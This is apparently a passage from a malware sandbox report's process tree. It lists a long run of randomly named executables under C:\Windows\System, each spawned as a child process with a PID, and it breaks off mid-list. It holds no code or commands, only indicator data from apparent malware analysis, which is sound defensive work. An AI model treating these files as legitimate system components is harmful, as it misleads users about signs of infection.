- C:\Windows\System\UwgFQph.exe
  C:\Windows\System\UwgFQph.exe
  2⤵
  PID:4924
- C:\Windows\System\GgHrtNl.exe
  C:\Windows\System\GgHrtNl.exe
  2⤵
  PID:5376
- C:\Windows\System\tZACgnH.exe
  C:\Windows\System\tZACgnH.exe
  2⤵
  PID:5404
- C:\Windows\System\LWSFVrQ.exe
  C:\Windows\System\LWSFVrQ.exe
  2⤵
  PID:2896
- C:\Windows\System\HVtXjDt.exe
  C:\Windows\System\HVtXjDt.exe
  2⤵
  PID:5488
- C:\Windows\System\EMISxbk.exe
  C:\Windows\System\EMISxbk.exe
  2⤵
  PID:5520
- C:\Windows\System\OAPUrEJ.exe
  C:\Windows\System\OAPUrEJ.exe
  2⤵
  PID:2856
- C:\Windows\System\EgoYLgf.exe
  C:\Windows\System\EgoYLgf.exe
  2⤵
  PID:5668
- C:\Windows\System\mORIZfF.exe
  C:\Windows\System\mORIZfF.exe
  2⤵
  PID:5060
- C:\Windows\System\lpGMuFd.exe
  C:\Windows\System\lpGMuFd.exe
  2⤵
  PID:5712
- C:\Windows\System\loMknLS.exe
  C:\Windows\System\loMknLS.exe
  2⤵
  PID:4544
- C:\Windows\System\yhwVjNS.exe
  C:\Windows\System\yhwVjNS.exe
  2⤵
  PID:3776
- C:\Windows\System\SCISxXr.exe
  C:\Windows\System\SCISxXr.exe
  2⤵
  PID:5744
- C:\Windows\System\rYksmll.exe
  C:\Windows\System\rYksmll.exe
  2⤵
  PID:3536
- C:\Windows\System\FCdAiMQ.exe
  C:\Windows\System\FCdAiMQ.exe
  2⤵
  PID:5768
- C:\Windows\System\THVohNZ.exe
  C:\Windows\System\THVohNZ.exe
  2⤵
  PID:5840
- C:\Windows\System\YaHSIVH.exe
  C:\Windows\System\YaHSIVH.exe
  2⤵
  PID:5836
- C:\Windows\System\EKcJLhu.exe
  C:\Windows\System\EKcJLhu.exe
  2⤵
  PID:5904
- C:\Windows\System\TZowqlO.exe
  C:\Windows\System\TZowqlO.exe
  2⤵
  PID:5960
- C:\Windows\System\ySpUvQo.exe
  C:\Windows\System\ySpUvQo.exe
  2⤵
  PID:6000
- C:\Windows\System\mIozubc.exe
  C:\Windows\System\mIozubc.exe
  2⤵
  PID:2308
- C:\Windows\System\ephbNeE.exe
  C:\Windows\System\ephbNeE.exe
  2⤵
  PID:4092
- C:\Windows\System\vVecZCm.exe
  C:\Windows\System\vVecZCm.exe
  2⤵
  PID:3104
- C:\Windows\System\dEGUSpe.exe
  C:\Windows\System\dEGUSpe.exe
  2⤵
  PID:5228
- C:\Windows\System\JirzzID.exe
  C:\Windows\System\JirzzID.exe
  2⤵
  PID:5344
- C:\Windows\System\afirQfV.exe
  C:\Windows\System\afirQfV.exe
  2⤵
  PID:3844
- C:\Windows\System\JSAMkjk.exe
  C:\Windows\System\JSAMkjk.exe
  2⤵
  PID:1556
- C:\Windows\System\gMLebAj.exe
  C:\Windows\System\gMLebAj.exe
  2⤵
  PID:5576
- C:\Windows\System\GVzkYOv.exe
  C:\Windows\System\GVzkYOv.exe
  2⤵
  PID:3504
- C:\Windows\System\hhYdwbC.exe
  C:\Windows\System\hhYdwbC.exe
  2⤵
  PID:4064
- C:\Windows\System\pQCcIpS.exe
  C:\Windows\System\pQCcIpS.exe
  2⤵
  PID:5820
- C:\Windows\System\AiCdxpe.exe
  C:\Windows\System\AiCdxpe.exe
  2⤵
  PID:6024
- C:\Windows\System\akofKtM.exe
  C:\Windows\System\akofKtM.exe
  2⤵
  PID:5824
- C:\Windows\System\tiVlYME.exe
  C:\Windows\System\tiVlYME.exe
  2⤵
  PID:6140
- C:\Windows\System\xIJFVes.exe
  C:\Windows\System\xIJFVes.exe
  2⤵
  PID:5484
- C:\Windows\System\MCYmUKh.exe
  C:\Windows\System\MCYmUKh.exe
  2⤵
  PID:2812
- C:\Windows\System\RMsftxg.exe
  C:\Windows\System\RMsftxg.exe
  2⤵
  PID:1780
- C:\Windows\System\WYpdWCA.exe
  C:\Windows\System\WYpdWCA.exe
  2⤵
  PID:4724
- C:\Windows\System\YqlmXqq.exe
  C:\Windows\System\YqlmXqq.exe
  2⤵
  PID:4720
- C:\Windows\System\KlcbeUL.exe
  C:\Windows\System\KlcbeUL.exe
  2⤵
  PID:3136
- C:\Windows\System\cTtuKCH.exe
  C:\Windows\System\cTtuKCH.exe
  2⤵
  PID:3992
- C:\Windows\System\jdKnVCt.exe
  C:\Windows\System\jdKnVCt.exe
  2⤵
  PID:6156
- C:\Windows\System\XCgROmP.exe
  C:\Windows\System\XCgROmP.exe
  2⤵
  PID:6180
- C:\Windows\System\TQOeEBc.exe
  C:\Windows\System\TQOeEBc.exe
  2⤵
  PID:6240
- C:\Windows\System\pIiOabo.exe
  C:\Windows\System\pIiOabo.exe
  2⤵
  PID:6296
- C:\Windows\System\ezhBEEC.exe
  C:\Windows\System\ezhBEEC.exe
  2⤵
  PID:6340
- C:\Windows\System\RJhpCfi.exe
  C:\Windows\System\RJhpCfi.exe
  2⤵
  PID:6356
- C:\Windows\System\JFPqmzH.exe
  C:\Windows\System\JFPqmzH.exe
  2⤵
  PID:6388
- C:\Windows\System\CXxFTsW.exe
  C:\Windows\System\CXxFTsW.exe
  2⤵
  PID:6404
- C:\Windows\System\xHuhDBn.exe
  C:\Windows\System\xHuhDBn.exe
  2⤵
  PID:6424
- C:\Windows\System\OYxTJPY.exe
  C:\Windows\System\OYxTJPY.exe
  2⤵
  PID:6440
- C:\Windows\System\jHywxpB.exe
  C:\Windows\System\jHywxpB.exe
  2⤵
  PID:6460
- C:\Windows\System\PhCMrtD.exe
  C:\Windows\System\PhCMrtD.exe
  2⤵
  PID:6476
- C:\Windows\System\iXtJftJ.exe
  C:\Windows\System\iXtJftJ.exe
  2⤵
  PID:6496
- C:\Windows\System\GirzthE.exe
  C:\Windows\System\GirzthE.exe
  2⤵
  PID:6512
- C:\Windows\System\LWAAfJP.exe
  C:\Windows\System\LWAAfJP.exe
  2⤵
  PID:6528
- C:\Windows\System\lTrxyRx.exe
  C:\Windows\System\lTrxyRx.exe
  2⤵
  PID:6608
- C:\Windows\System\fKlGxAV.exe
  C:\Windows\System\fKlGxAV.exe
  2⤵
  PID:6628
- C:\Windows\System\SvAEeXT.exe
  C:\Windows\System\SvAEeXT.exe
  2⤵
  PID:6688
- C:\Windows\System\RWwcAJK.exe
  C:\Windows\System\RWwcAJK.exe
  2⤵
  PID:6708
- C:\Windows\System\oyLqTEn.exe
  C:\Windows\System\oyLqTEn.exe
  2⤵
  PID:6732
- C:\Windows\System\mgrzrQG.exe
  C:\Windows\System\mgrzrQG.exe
  2⤵
  PID:6752
- C:\Windows\System\EHITLKM.exe
  C:\Windows\System\EHITLKM.exe
  2⤵
  PID:6768
- C:\Windows\System\ExrCQbI.exe
  C:\Windows\System\ExrCQbI.exe
  2⤵
  PID:6788
- C:\Windows\System\JgyevGK.exe
  C:\Windows\System\JgyevGK.exe
  2⤵
  PID:6804
- C:\Windows\System\jdHBYIj.exe
  C:\Windows\System\jdHBYIj.exe
  2⤵
  PID:6860
- C:\Windows\System\jUmtALc.exe
  C:\Windows\System\jUmtALc.exe
  2⤵
  PID:6916
- C:\Windows\System\CsayeeQ.exe
  C:\Windows\System\CsayeeQ.exe
  2⤵
  PID:6936
- C:\Windows\System\ZFkOUuN.exe
  C:\Windows\System\ZFkOUuN.exe
  2⤵
  PID:6968
- C:\Windows\System\bXMJwHh.exe
  C:\Windows\System\bXMJwHh.exe
  2⤵
  PID:6988
- C:\Windows\System\UeqzIua.exe
  C:\Windows\System\UeqzIua.exe
  2⤵
  PID:7004
- C:\Windows\System\AOEuXnw.exe
  C:\Windows\System\AOEuXnw.exe
  2⤵
  PID:7036
- C:\Windows\System\ZoYAyIJ.exe
  C:\Windows\System\ZoYAyIJ.exe
  2⤵
  PID:7052
- C:\Windows\System\SFiCQyE.exe
  C:\Windows\System\SFiCQyE.exe
  2⤵
  PID:7072
- C:\Windows\System\samlmor.exe
  C:\Windows\System\samlmor.exe
  2⤵
  PID:7092
- C:\Windows\System\qGjCRJp.exe
  C:\Windows\System\qGjCRJp.exe
  2⤵
  PID:7112
- C:\Windows\System\QHMMVBG.exe
  C:\Windows\System\QHMMVBG.exe
  2⤵
  PID:7132
- C:\Windows\System\knlizFd.exe
  C:\Windows\System\knlizFd.exe
  2⤵
  PID:7164
- C:\Windows\System\csyAjFc.exe
  C:\Windows\System\csyAjFc.exe
  2⤵
  PID:6216
- C:\Windows\System\PzxvIWq.exe
  C:\Windows\System\PzxvIWq.exe
  2⤵
  PID:6232
- C:\Windows\System\EuwnOaJ.exe
  C:\Windows\System\EuwnOaJ.exe
  2⤵
  PID:5828
- C:\Windows\System\HSjkKna.exe
  C:\Windows\System\HSjkKna.exe
  2⤵
  PID:6276
- C:\Windows\System\FKsPrYz.exe
  C:\Windows\System\FKsPrYz.exe
  2⤵
  PID:6436
- C:\Windows\System\HHBdECu.exe
  C:\Windows\System\HHBdECu.exe
  2⤵
  PID:6372
- C:\Windows\System\FOPumMC.exe
  C:\Windows\System\FOPumMC.exe
  2⤵
  PID:6548
- C:\Windows\System\bVZsdMY.exe
  C:\Windows\System\bVZsdMY.exe
  2⤵
  PID:6556
- C:\Windows\System\gLeUkFS.exe
  C:\Windows\System\gLeUkFS.exe
  2⤵
  PID:6584
- C:\Windows\System\zqWHJus.exe
  C:\Windows\System\zqWHJus.exe
  2⤵
  PID:6784
- C:\Windows\System\UiYaJDr.exe
  C:\Windows\System\UiYaJDr.exe
  2⤵
  PID:6876
- C:\Windows\System\zNtPptR.exe
  C:\Windows\System\zNtPptR.exe
  2⤵
  PID:6868
- C:\Windows\System\kcANibP.exe
  C:\Windows\System\kcANibP.exe
  2⤵
  PID:6912
- C:\Windows\System\LZbUOId.exe
  C:\Windows\System\LZbUOId.exe
  2⤵
  PID:6976
- C:\Windows\System\srFYXCC.exe
  C:\Windows\System\srFYXCC.exe
  2⤵
  PID:7000
- C:\Windows\System\DdNVVME.exe
  C:\Windows\System\DdNVVME.exe
  2⤵
  PID:6208
- C:\Windows\System\kDdtwAz.exe
  C:\Windows\System\kDdtwAz.exe
  2⤵
  PID:7048
- C:\Windows\System\vjmKVjS.exe
  C:\Windows\System\vjmKVjS.exe
  2⤵
  PID:6400
- C:\Windows\System\NtlyYnW.exe
  C:\Windows\System\NtlyYnW.exe
  2⤵
  PID:6448
- C:\Windows\System\oTGqOgx.exe
  C:\Windows\System\oTGqOgx.exe
  2⤵
  PID:6652
- C:\Windows\System\ESAsCWz.exe
  C:\Windows\System\ESAsCWz.exe
  2⤵
  PID:6892
- C:\Windows\System\gIPlztr.exe
  C:\Windows\System\gIPlztr.exe
  2⤵
  PID:6984
- C:\Windows\System\LysufaR.exe
  C:\Windows\System\LysufaR.exe
  2⤵
  PID:6796
- C:\Windows\System\rTkPUUx.exe
  C:\Windows\System\rTkPUUx.exe
  2⤵
  PID:6844
- C:\Windows\System\BxfEdXM.exe
  C:\Windows\System\BxfEdXM.exe
  2⤵
  PID:7100
- C:\Windows\System\XJWtCHm.exe
  C:\Windows\System\XJWtCHm.exe
  2⤵
  PID:7064
- C:\Windows\System\njWmoBV.exe
  C:\Windows\System\njWmoBV.exe
  2⤵
  PID:7188
- C:\Windows\System\DjixAId.exe
  C:\Windows\System\DjixAId.exe
  2⤵
  PID:7260
- C:\Windows\System\IMloQkY.exe
  C:\Windows\System\IMloQkY.exe
  2⤵
  PID:7288
- C:\Windows\System\WzZOOYV.exe
  C:\Windows\System\WzZOOYV.exe
  2⤵
  PID:7304
- C:\Windows\System\cIZFElF.exe
  C:\Windows\System\cIZFElF.exe
  2⤵
  PID:7324
- C:\Windows\System\kljNyQA.exe
  C:\Windows\System\kljNyQA.exe
  2⤵
  PID:7340
- C:\Windows\System\hTgDuIB.exe
  C:\Windows\System\hTgDuIB.exe
  2⤵
  PID:7356
- C:\Windows\System\cZOUNNE.exe
  C:\Windows\System\cZOUNNE.exe
  2⤵
  PID:7376
- C:\Windows\System\KDgtwrQ.exe
  C:\Windows\System\KDgtwrQ.exe
  2⤵
  PID:7460
- C:\Windows\System\GOsBtkS.exe
  C:\Windows\System\GOsBtkS.exe
  2⤵
  PID:7480
- C:\Windows\System\cIyHABr.exe
  C:\Windows\System\cIyHABr.exe
  2⤵
  PID:7496
- C:\Windows\System\xjVntTS.exe
  C:\Windows\System\xjVntTS.exe
  2⤵
  PID:7520
- C:\Windows\System\GAxiYYq.exe
  C:\Windows\System\GAxiYYq.exe
  2⤵
  PID:7540
- C:\Windows\System\ZnENOxd.exe
  C:\Windows\System\ZnENOxd.exe
  2⤵
  PID:7560
- C:\Windows\System\GwHGoqd.exe
  C:\Windows\System\GwHGoqd.exe
  2⤵
  PID:7580
- C:\Windows\System\taocAkM.exe
  C:\Windows\System\taocAkM.exe
  2⤵
  PID:7600
- C:\Windows\System\whpFmLH.exe
  C:\Windows\System\whpFmLH.exe
  2⤵
  PID:7620
- C:\Windows\System\AUsbfci.exe
  C:\Windows\System\AUsbfci.exe
  2⤵
  PID:7644
- C:\Windows\System\IhsfLMx.exe
  C:\Windows\System\IhsfLMx.exe
  2⤵
  PID:7664
- C:\Windows\System\sggBDcu.exe
  C:\Windows\System\sggBDcu.exe
  2⤵
  PID:7680
- C:\Windows\System\rrsjwDB.exe
  C:\Windows\System\rrsjwDB.exe
  2⤵
  PID:7704
- C:\Windows\System\QCRQZUK.exe
  C:\Windows\System\QCRQZUK.exe
  2⤵
  PID:7724
- C:\Windows\System\IyVzRpL.exe
  C:\Windows\System\IyVzRpL.exe
  2⤵
  PID:7744
- C:\Windows\System\NTumQzt.exe
  C:\Windows\System\NTumQzt.exe
  2⤵
  PID:7768
- C:\Windows\System\KSbodRr.exe
  C:\Windows\System\KSbodRr.exe
  2⤵
  PID:7792
- C:\Windows\System\EBTcQwe.exe
  C:\Windows\System\EBTcQwe.exe
  2⤵
  PID:7884
- C:\Windows\System\rQrCWKx.exe
  C:\Windows\System\rQrCWKx.exe
  2⤵
  PID:7904
- C:\Windows\System\nJWLkhd.exe
  C:\Windows\System\nJWLkhd.exe
  2⤵
  PID:7928
- C:\Windows\System\GUAymVM.exe
  C:\Windows\System\GUAymVM.exe
  2⤵
  PID:8048
- C:\Windows\System\SGuRubW.exe
  C:\Windows\System\SGuRubW.exe
  2⤵
  PID:8140
- C:\Windows\System\pnVdSWd.exe
  C:\Windows\System\pnVdSWd.exe
  2⤵
  PID:8184
- C:\Windows\System\hjixFmh.exe
  C:\Windows\System\hjixFmh.exe
  2⤵
  PID:6176
- C:\Windows\System\hOmVCGZ.exe
  C:\Windows\System\hOmVCGZ.exe
  2⤵
  PID:4056
- C:\Windows\System\anubvml.exe
  C:\Windows\System\anubvml.exe
  2⤵
  PID:6740
- C:\Windows\System\gxarYER.exe
  C:\Windows\System\gxarYER.exe
  2⤵
  PID:7200
- C:\Windows\System\NuuuwSv.exe
  C:\Windows\System\NuuuwSv.exe
  2⤵
  PID:6964
- C:\Windows\System\hvApHMO.exe
  C:\Windows\System\hvApHMO.exe
  2⤵
  PID:7316
- C:\Windows\System\ivhSfcl.exe
  C:\Windows\System\ivhSfcl.exe
  2⤵
  PID:6332
- C:\Windows\System\VBvnaXa.exe
  C:\Windows\System\VBvnaXa.exe
  2⤵
  PID:6520
- C:\Windows\System\lvrDGhw.exe
  C:\Windows\System\lvrDGhw.exe
  2⤵
  PID:7276
- C:\Windows\System\aWfdTeb.exe
  C:\Windows\System\aWfdTeb.exe
  2⤵
  PID:7436
- C:\Windows\System\ywTCXKA.exe
  C:\Windows\System\ywTCXKA.exe
  2⤵
  PID:7368
- C:\Windows\System\vMmfgxk.exe
  C:\Windows\System\vMmfgxk.exe
  2⤵
  PID:7676
- C:\Windows\System\iLllTQy.exe
  C:\Windows\System\iLllTQy.exe
  2⤵
  PID:7504
- C:\Windows\System\HGNMAxO.exe
  C:\Windows\System\HGNMAxO.exe
  2⤵
  PID:7672
- C:\Windows\System\oSvXYaA.exe
  C:\Windows\System\oSvXYaA.exe
  2⤵
  PID:7572
- C:\Windows\System\XXanjgU.exe
  C:\Windows\System\XXanjgU.exe
  2⤵
  PID:7612
- C:\Windows\System\NAHnPRf.exe
  C:\Windows\System\NAHnPRf.exe
  2⤵
  PID:7912
- C:\Windows\System\nqfjbpL.exe
  C:\Windows\System\nqfjbpL.exe
  2⤵
  PID:7688
- C:\Windows\System\EZMUHgE.exe
  C:\Windows\System\EZMUHgE.exe
  2⤵
  PID:5976
- C:\Windows\System\cmDbrGu.exe
  C:\Windows\System\cmDbrGu.exe
  2⤵
  PID:8128
- C:\Windows\System\EZfVjhW.exe
  C:\Windows\System\EZfVjhW.exe
  2⤵
  PID:7204
- C:\Windows\System\ETQDSRP.exe
  C:\Windows\System\ETQDSRP.exe
  2⤵
  PID:7272
- C:\Windows\System\qdczsfK.exe
  C:\Windows\System\qdczsfK.exe
  2⤵
  PID:7812
- C:\Windows\System\FhYHerZ.exe
  C:\Windows\System\FhYHerZ.exe
  2⤵
  PID:8060
- C:\Windows\System\vpIJMcT.exe
  C:\Windows\System\vpIJMcT.exe
  2⤵
  PID:7980
- C:\Windows\System\dnoXecb.exe
  C:\Windows\System\dnoXecb.exe
  2⤵
  PID:6748
- C:\Windows\System\iGQyRoT.exe
  C:\Windows\System\iGQyRoT.exe
  2⤵
  PID:6292
- C:\Windows\System\IQGWzAi.exe
  C:\Windows\System\IQGWzAi.exe
  2⤵
  PID:7848
- C:\Windows\System\fAlfskM.exe
  C:\Windows\System\fAlfskM.exe
  2⤵
  PID:8196
- C:\Windows\System\MyYFOnt.exe
  C:\Windows\System\MyYFOnt.exe
  2⤵
  PID:8252
- C:\Windows\System\VfNSOIP.exe
  C:\Windows\System\VfNSOIP.exe
  2⤵
  PID:8272
- C:\Windows\System\mPqiMgQ.exe
  C:\Windows\System\mPqiMgQ.exe
  2⤵
  PID:8300
- C:\Windows\System\UVVpqEI.exe
  C:\Windows\System\UVVpqEI.exe
  2⤵
  PID:8320
- C:\Windows\System\QYVpurj.exe
  C:\Windows\System\QYVpurj.exe
  2⤵
  PID:8336
- C:\Windows\System\eaGqzTP.exe
  C:\Windows\System\eaGqzTP.exe
  2⤵
  PID:8352
- C:\Windows\System\HMgJWpe.exe
  C:\Windows\System\HMgJWpe.exe
  2⤵
  PID:8384
- C:\Windows\System\NEMCGrf.exe
  C:\Windows\System\NEMCGrf.exe
  2⤵
  PID:8404
- C:\Windows\System\GsTcoER.exe
  C:\Windows\System\GsTcoER.exe
  2⤵
  PID:8448
- C:\Windows\System\qfHtkmK.exe
  C:\Windows\System\qfHtkmK.exe
  2⤵
  PID:8468
- C:\Windows\System\IjPMAnK.exe
  C:\Windows\System\IjPMAnK.exe
  2⤵
  PID:8584
- C:\Windows\System\IKXPSCq.exe
  C:\Windows\System\IKXPSCq.exe
  2⤵
  PID:8624
- C:\Windows\System\ewaqVDu.exe
  C:\Windows\System\ewaqVDu.exe
  2⤵
  PID:8664
- C:\Windows\System\qwSBgHs.exe
  C:\Windows\System\qwSBgHs.exe
  2⤵
  PID:8696
- C:\Windows\System\rgZDCFu.exe
  C:\Windows\System\rgZDCFu.exe
  2⤵
  PID:8728
- C:\Windows\System\OyHhmuN.exe
  C:\Windows\System\OyHhmuN.exe
  2⤵
  PID:8788
- C:\Windows\System\vWUcyIH.exe
  C:\Windows\System\vWUcyIH.exe
  2⤵
  PID:8812
- C:\Windows\System\hExzpHu.exe
  C:\Windows\System\hExzpHu.exe
  2⤵
  PID:8836
- C:\Windows\System\piPBRkE.exe
  C:\Windows\System\piPBRkE.exe
  2⤵
  PID:8868
- C:\Windows\System\MunVnPp.exe
  C:\Windows\System\MunVnPp.exe
  2⤵
  PID:8904
- C:\Windows\System\IgmXRYd.exe
  C:\Windows\System\IgmXRYd.exe
  2⤵
  PID:8920
- C:\Windows\System\gmHrqdO.exe
  C:\Windows\System\gmHrqdO.exe
  2⤵
  PID:8952
- C:\Windows\System\irNQMNw.exe
  C:\Windows\System\irNQMNw.exe
  2⤵
  PID:8988
- C:\Windows\System\BSsOEXw.exe
  C:\Windows\System\BSsOEXw.exe
  2⤵
  PID:9028
- C:\Windows\System\FrYciEN.exe
  C:\Windows\System\FrYciEN.exe
  2⤵
  PID:9072
- C:\Windows\System\oQdeyGe.exe
  C:\Windows\System\oQdeyGe.exe
  2⤵
  PID:9104
- C:\Windows\System\rvSJBIx.exe
  C:\Windows\System\rvSJBIx.exe
  2⤵
  PID:9136
- C:\Windows\System\gFDMGZp.exe
  C:\Windows\System\gFDMGZp.exe
  2⤵
  PID:9168
- C:\Windows\System\VgNgToV.exe
  C:\Windows\System\VgNgToV.exe
  2⤵
  PID:9208
- C:\Windows\System\gnXyGpE.exe
  C:\Windows\System\gnXyGpE.exe
  2⤵
  PID:8724
- C:\Windows\System\LdiQgPa.exe
  C:\Windows\System\LdiQgPa.exe
  2⤵
  PID:8916
- C:\Windows\System\gxfXvNM.exe
  C:\Windows\System\gxfXvNM.exe
  2⤵
  PID:9064
- C:\Windows\System\vyIJKRA.exe
  C:\Windows\System\vyIJKRA.exe
  2⤵
  PID:9096
- C:\Windows\System\beRnftD.exe
  C:\Windows\System\beRnftD.exe
  2⤵
  PID:9200
- C:\Windows\System\MCsraql.exe
  C:\Windows\System\MCsraql.exe
  2⤵
  PID:8232
- C:\Windows\System\UKSZrap.exe
  C:\Windows\System\UKSZrap.exe
  2⤵
  PID:8436
- C:\Windows\System\HleQhAi.exe
  C:\Windows\System\HleQhAi.exe
  2⤵
  PID:8376
- C:\Windows\System\kYexzgA.exe
  C:\Windows\System\kYexzgA.exe
  2⤵
  PID:8424
- C:\Windows\System\JkkOquH.exe
  C:\Windows\System\JkkOquH.exe
  2⤵
  PID:8524
- C:\Windows\System\bNpiIjO.exe
  C:\Windows\System\bNpiIjO.exe
  2⤵
  PID:2564
- C:\Windows\System\VCteJDF.exe
  C:\Windows\System\VCteJDF.exe
  2⤵
  PID:7752
- C:\Windows\System\VoCbdhF.exe
  C:\Windows\System\VoCbdhF.exe
  2⤵
  PID:7232
- C:\Windows\System\ONcKeme.exe
  C:\Windows\System\ONcKeme.exe
  2⤵
  PID:8780
- C:\Windows\System\scKRTjG.exe
  C:\Windows\System\scKRTjG.exe
  2⤵
  PID:8832
- C:\Windows\System\eAzegQC.exe
  C:\Windows\System\eAzegQC.exe
  2⤵
  PID:2544
- C:\Windows\System\jBTEZaU.exe
  C:\Windows\System\jBTEZaU.exe
  2⤵
  PID:9024
- C:\Windows\System\XbWULZR.exe
  C:\Windows\System\XbWULZR.exe
  2⤵
  PID:8064
- C:\Windows\System\IxeRCMw.exe
  C:\Windows\System\IxeRCMw.exe
  2⤵
  PID:8632
- C:\Windows\System\sOsOjPo.exe
  C:\Windows\System\sOsOjPo.exe
  2⤵
  PID:8260
- C:\Windows\System\HTLUOJp.exe
  C:\Windows\System\HTLUOJp.exe
  2⤵
  PID:8348
- C:\Windows\System\KiONEII.exe
  C:\Windows\System\KiONEII.exe
  2⤵
  PID:6020
- C:\Windows\System\VmnFsym.exe
  C:\Windows\System\VmnFsym.exe
  2⤵
  PID:8496
- C:\Windows\System\PrxacBD.exe
  C:\Windows\System\PrxacBD.exe
  2⤵
  PID:8704
- C:\Windows\System\LMPIHoJ.exe
  C:\Windows\System\LMPIHoJ.exe
  2⤵
  PID:4560
- C:\Windows\System\ywMDUQo.exe
  C:\Windows\System\ywMDUQo.exe
  2⤵
  PID:8996
- C:\Windows\System\ezzhkSd.exe
  C:\Windows\System\ezzhkSd.exe
  2⤵
  PID:9036
- C:\Windows\System\QbWNrGe.exe
  C:\Windows\System\QbWNrGe.exe
  2⤵
  PID:7740
- C:\Windows\System\WuUJHBc.exe
  C:\Windows\System\WuUJHBc.exe
  2⤵
  PID:8828
- C:\Windows\System\qeAbgTm.exe
  C:\Windows\System\qeAbgTm.exe
  2⤵
  PID:8760
- C:\Windows\System\MrwKGoU.exe
  C:\Windows\System\MrwKGoU.exe
  2⤵
  PID:9252
- C:\Windows\System\TZdVTAA.exe
  C:\Windows\System\TZdVTAA.exe
  2⤵
  PID:9268
- C:\Windows\System\MUGyVBQ.exe
  C:\Windows\System\MUGyVBQ.exe
  2⤵
  PID:9284
- C:\Windows\System\pvapScR.exe
  C:\Windows\System\pvapScR.exe
  2⤵
  PID:9308
- C:\Windows\System\tDnFZtG.exe
  C:\Windows\System\tDnFZtG.exe
  2⤵
  PID:9328
- C:\Windows\System\YVsgiqP.exe
  C:\Windows\System\YVsgiqP.exe
  2⤵
  PID:9368
- C:\Windows\System\AbcjSYE.exe
  C:\Windows\System\AbcjSYE.exe
  2⤵
  PID:9388
- C:\Windows\System\lYdfUOS.exe
  C:\Windows\System\lYdfUOS.exe
  2⤵
  PID:9408
- C:\Windows\System\bKqiSkr.exe
  C:\Windows\System\bKqiSkr.exe
  2⤵
  PID:9424
- C:\Windows\System\mJOResZ.exe
  C:\Windows\System\mJOResZ.exe
  2⤵
  PID:9484
- C:\Windows\System\cRiDMrA.exe
  C:\Windows\System\cRiDMrA.exe
  2⤵
  PID:9528
- C:\Windows\System\GTSLPZs.exe
  C:\Windows\System\GTSLPZs.exe
  2⤵
  PID:9548
- C:\Windows\System\fMTOWWw.exe
  C:\Windows\System\fMTOWWw.exe
  2⤵
  PID:9568
- C:\Windows\System\gGOSBMe.exe
  C:\Windows\System\gGOSBMe.exe
  2⤵
  PID:9592
- C:\Windows\System\tSJoUeU.exe
  C:\Windows\System\tSJoUeU.exe
  2⤵
  PID:9624
- C:\Windows\System\PPSxumu.exe
  C:\Windows\System\PPSxumu.exe
  2⤵
  PID:9640
- C:\Windows\System\hnuorhv.exe
  C:\Windows\System\hnuorhv.exe
  2⤵
  PID:9660
- C:\Windows\System\EaSJUnB.exe
  C:\Windows\System\EaSJUnB.exe
  2⤵
  PID:9692
- C:\Windows\System\tJThhrr.exe
  C:\Windows\System\tJThhrr.exe
  2⤵
  PID:9712
- C:\Windows\System\IReeDYF.exe
  C:\Windows\System\IReeDYF.exe
  2⤵
  PID:9732
- C:\Windows\System\GgmrEtW.exe
  C:\Windows\System\GgmrEtW.exe
  2⤵
  PID:9748
- C:\Windows\System\MWzOpwW.exe
  C:\Windows\System\MWzOpwW.exe
  2⤵
  PID:9768
- C:\Windows\System\yOFWikq.exe
  C:\Windows\System\yOFWikq.exe
  2⤵
  PID:9828
- C:\Windows\System\zuDnyWZ.exe
  C:\Windows\System\zuDnyWZ.exe
  2⤵
  PID:9892
- C:\Windows\System\YrcQejy.exe
  C:\Windows\System\YrcQejy.exe
  2⤵
  PID:9940
- C:\Windows\System\JAYjIjI.exe
  C:\Windows\System\JAYjIjI.exe
  2⤵
  PID:10008
- C:\Windows\System\jSuDCrY.exe
  C:\Windows\System\jSuDCrY.exe
  2⤵
  PID:10024
- C:\Windows\System\eWtbPIb.exe
  C:\Windows\System\eWtbPIb.exe
  2⤵
  PID:10044
- C:\Windows\System\WxQPabk.exe
  C:\Windows\System\WxQPabk.exe
  2⤵
  PID:10060
- C:\Windows\System\SGhopQz.exe
  C:\Windows\System\SGhopQz.exe
  2⤵
  PID:10076
- C:\Windows\System\JvbqGbP.exe
  C:\Windows\System\JvbqGbP.exe
  2⤵
  PID:10124
- C:\Windows\System\mawMmwd.exe
  C:\Windows\System\mawMmwd.exe
  2⤵
  PID:10188
- C:\Windows\System\bgjvbOe.exe
  C:\Windows\System\bgjvbOe.exe
  2⤵
  PID:10204
- C:\Windows\System\prJxnBi.exe
  C:\Windows\System\prJxnBi.exe
  2⤵
  PID:10236
- C:\Windows\System\acXXNOM.exe
  C:\Windows\System\acXXNOM.exe
  2⤵
  PID:9248
- C:\Windows\System\RiroJjj.exe
  C:\Windows\System\RiroJjj.exe
  2⤵
  PID:9100
- C:\Windows\System\EjrGzuG.exe
  C:\Windows\System\EjrGzuG.exe
  2⤵
  PID:9304
- C:\Windows\System\mGMfyGT.exe
  C:\Windows\System\mGMfyGT.exe
  2⤵
  PID:9340
- C:\Windows\System\QiTrfpx.exe
  C:\Windows\System\QiTrfpx.exe
  2⤵
  PID:9416
- C:\Windows\System\Lorkiys.exe
  C:\Windows\System\Lorkiys.exe
  2⤵
  PID:9376
- C:\Windows\System\fdxAnaK.exe
  C:\Windows\System\fdxAnaK.exe
  2⤵
  PID:9576
- C:\Windows\System\dMoljou.exe
  C:\Windows\System\dMoljou.exe
  2⤵
  PID:9616
- C:\Windows\System\SUetECe.exe
  C:\Windows\System\SUetECe.exe
  2⤵
  PID:9636
- C:\Windows\System\LgRoSvU.exe
  C:\Windows\System\LgRoSvU.exe
  2⤵
  PID:9720
- C:\Windows\System\QGZVtJw.exe
  C:\Windows\System\QGZVtJw.exe
  2⤵
  PID:9780
- C:\Windows\System\sjmGUDJ.exe
  C:\Windows\System\sjmGUDJ.exe
  2⤵
  PID:9820
- C:\Windows\System\FFRXbxC.exe
  C:\Windows\System\FFRXbxC.exe
  2⤵
  PID:9928
- C:\Windows\System\KAFwTep.exe
  C:\Windows\System\KAFwTep.exe
  2⤵
  PID:9952
- C:\Windows\System\AaExHkH.exe
  C:\Windows\System\AaExHkH.exe
  2⤵
  PID:2840
- C:\Windows\System\OaOXLsk.exe
  C:\Windows\System\OaOXLsk.exe
  2⤵
  PID:9984
- C:\Windows\System\YJDZsLv.exe
  C:\Windows\System\YJDZsLv.exe
  2⤵
  PID:10104
- C:\Windows\System\HFZhzBl.exe
  C:\Windows\System\HFZhzBl.exe
  2⤵
  PID:9824
- C:\Windows\System\LExKyuX.exe
  C:\Windows\System\LExKyuX.exe
  2⤵
  PID:4504
- C:\Windows\System\DXQlRPA.exe
  C:\Windows\System\DXQlRPA.exe
  2⤵
